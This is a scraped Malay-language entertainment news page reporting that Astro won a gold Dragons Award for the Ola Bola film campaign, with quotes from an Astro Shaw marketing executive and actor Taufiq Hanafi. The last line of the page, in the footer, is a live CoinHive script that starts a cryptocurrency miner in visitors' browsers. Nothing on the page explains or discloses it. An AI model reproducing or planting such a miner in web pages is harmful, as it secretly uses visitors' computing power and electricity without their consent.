© Copyright 2017, All Rights Reserved
Home / Hiburan / Astro peroleh anugerah emas menerusi filem Ola Bola di Dragons Awards

Astro peroleh anugerah emas menerusi filem Ola Bola di Dragons Awards


KUALA LUMPUR: Astro menggondol dua anugerah di Dragons of Malaysia and Asia Awards malam tadi.

Salah satu anugerah diterima menerusi filem Ola Bola terbitan Astro Shaw yang ditayangkan tahun lepas.

Ola Bola diumumkan sebagai penerima anugerah emas bagi kategori Best Entertainment Campaign. Tahun lalu, Astro memenangi anugerah yang sama menerusi filem Polis Evo.

Bagi Penolong Naib Presiden Bahagian Pemasaran dan Pengedaran Astro Shaw, Norsalvina Alwee, kemenangan Ola Bola cukup bermakna kerana filem tersebut meninggalkan kenangan manis bagi bahagian pemasaran Astro.

“Tahun lepas kita (Astro) menang menerusi filem Polis Evo dan tahun ini filem Ola Bola pula yang menang, jadi kemenangan ini sangat bererti kerana filem ini kenangan manis untuk keseluruhan bahagian pemasaran Astro.

“Kalau ikutkan, dengan Ola Bola ini, bukan hanya bersatu dalam filem tetapi seluruh Astro bersatu untuk memasarkan filem ini,” katanya ketika ditemui selepas menerima anugerah tersebut.

Manakala salah seorang pelakon Ola Bola, Taufiq Hanafi, kemenangan itu cukup bermakna bagi dia dan pelakon lain.

“Kami (pelakon Ola Bola) ingin mengucapkan terima kasih dan sebanyak-banyak tahniah kepada pasukan pemasaran Astro malaysia yang bertungkus-lumus dan bersusah payah menghasilkan idea yang terbaik untuk filem Ola Bola,” katanya.

Drama bersiri Suri Hati Mr Pilot pula memenangi anugerah perak bagi kategori Best Social Media or Word Of Mouth Campaign.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Idayu juara AF Megastar 2017

SHAH ALAM: Idayu dinobatkan sebagai Juara AF Megastar sekali gus meraih wang ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();